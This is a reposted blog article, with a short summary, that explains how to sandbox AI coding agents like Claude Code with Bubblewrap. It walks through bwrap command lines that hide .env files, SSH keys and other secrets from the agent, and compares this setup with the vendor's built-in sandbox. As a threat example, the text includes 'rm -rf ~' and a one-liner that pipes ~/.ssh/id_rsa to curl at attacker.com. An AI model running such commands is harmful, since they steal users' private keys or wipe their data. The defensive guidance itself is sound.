Bubblewrap: A nimble way to prevent agents from accessing your .env files

原始链接: https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/

## Securing AI Agents with Bubblewrap

This article describes a shift in how the author secures AI coding agents such as Claude Code. Initially, the author recommended using a dedicated user account with standard Unix access controls to keep the agent away from sensitive files (for example, `.env` files containing secrets). They then found a simpler, more robust solution: **Bubblewrap**.

Bubblewrap lets you run untrusted code in a sandbox without relying on the agent's implementation or the vendor's safeguards. Unlike Docker, it is lightweight and requires no daemon. It isolates the agent, blocking access to sensitive data and limiting system access.

The author walks through a command-line example that builds a minimal sandbox restricting filesystem access and network connectivity. They also share a specific Bubblewrap configuration for running Claude Code with `--dangerously-skip-permissions`, covering the binds the tool needs in order to function (such as `.nvm` and `.claude`) and how to block access to sensitive files.

Ultimately, the author argues for self-reliance in security: depending solely on a vendor such as Anthropic carries risk. Bubblewrap puts the security boundary under the user's control and generalizes to *all* AI agents, not just Claude Code. The key is to enforce your own access controls rather than simply trusting the agent.


Original article

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide; I found a better approach and wanted to share it.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other, better approaches. Firejail would likely work well, but there’s also another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like ls, ps -aux, or less
  • You want to invoke this binary while easily preventing it from accessing sensitive files unrelated to the binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the damage those commands can do is bounded: the sensitive paths simply aren’t visible inside the sandbox.
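
To make that concrete, here’s an illustrative (hypothetical) session inside the sandbox configured later in this post, where the sensitive paths are simply never bound in:

# Inside the sandbox (illustrative; assumes ~/.ssh and ~/.aws were not bound)
cat ~/.ssh/id_rsa     # No such file or directory
ls ~/.aws             # No such file or directory
rm -rf ~              # can only touch the few paths you chose to bind writable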

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch ~/.aws, your browser profiles, your ~/Photos library, or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.
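
A natural next step, sketched here under the assumption that your project lives at $HOME/Development/YourProject (an illustrative path), is to bind exactly one writable project directory back into that ghost town while everything else stays hidden:

# Minimal sandbox plus a single writable project directory (illustrative paths)
PROJECT_DIR="$HOME/Development/YourProject"
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --bind "$PROJECT_DIR" "$PROJECT_DIR" \
      --chdir "$PROJECT_DIR" \
      --unshare-all --die-with-parent \
      /bin/bash

This is the shape the full Claude Code configuration below follows: read-only system binds, one read-write project bind, nothing else.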

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.
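
For contrast, here’s a rough (hypothetical) Docker equivalent of the minimal sandbox above; it needs the daemon running and an image pulled before anything happens:

# Roughly comparable isolation with Docker (assumes the daemon is running
# and debian:stable has been pulled)
docker run --rm -it --network none \
    -v "$HOME/Development/YourProject":/work -w /work \
    debian:stable bash

With Bubblewrap there is no image to build or pull and nothing left behind when the process exits.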

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this is --dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in designing, experimenting with & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld server and vends WebAssembly Quake clients. It’s an instant LAN party in a box. I did this unattended and it works. --dangerously-skip-permissions is very powerful, assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying them with /dev/null (you need to
# know the exact path of each file; see the sketch below for discovering them automatically)

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
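
If you’d rather not hard-code every path, one option (my own sketch, not from the original script) is to discover the .env files up front and build the overlay arguments in a bash array:

# Build a --ro-bind /dev/null overlay for every .env* file in the project
ENV_OVERLAYS=()
while IFS= read -r -d '' f; do
    ENV_OVERLAYS+=(--ro-bind /dev/null "$f")
done < <(find "$PROJECT_DIR" -name '.env*' -type f -print0)

# ...then pass "${ENV_OVERLAYS[@]}" to bwrap in place of the hard-coded lines above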

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.
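
To make the friction concrete, here’s roughly what the ACL bookkeeping looks like (a sketch assuming a dedicated "claude" account, as in the previous post):

# Grant the agent account access to the project, then punch holes for every secret
setfacl -R -m u:claude:rwX,d:u:claude:rwX "$HOME/Development/YourProject"
setfacl -m u:claude:--- "$HOME/Development/YourProject/.env"
setfacl -m u:claude:--- "$HOME/Development/YourProject/.env.local"
# ...and again for every new secret file, in every project, forever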

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.
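
For example, a host-wide UFW policy along these lines (an illustrative sketch, not from the original post) denies outbound traffic by default and opens only what you explicitly allow:

# Default-deny outbound, then allow just DNS and HTTPS
sudo ufw default deny outgoing
sudo ufw allow out 53
sudo ufw allow out 443/tcp
sudo ufw enable

The catch: this applies to the whole host and every process on it, not just the agent.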

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting: a user-wrapped invocation of Bubblewrap versus Bubblewrap embedded in a client.

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

| Threat | DIY bwrap | Anthropic SRT |
| --- | --- | --- |
| Claude accidentally rm -rf ~ | ✓ Protected | ✓ Protected |
| Claude exfiltrating ~/.ssh | ✓ Protected | ✓ Protected |
| Supply chain attack via npm | ✓ Not exposed | ✗ Exposed |
| Subtle misconfiguration | ✗ Your risk | ✓ Their expertise |
| Agent telemetry you don’t want sent | ✓ You control | ? Their choice |
| Novel bypass techniques | ✗ You’re on your own | ✓ Their team watches |

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m AI slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked differently: we’re not going to call claude, we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your $HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my GitHub.
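
In practice (a sketch reusing the hypothetical paths above), that means swapping only the final line of the bwrap command from the Claude Code section:

# Replace the final line of the bwrap invocation above with:
     /bin/bash "$PROJECT_DIR/sandbox-escape-test.sh"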

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy one-liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna
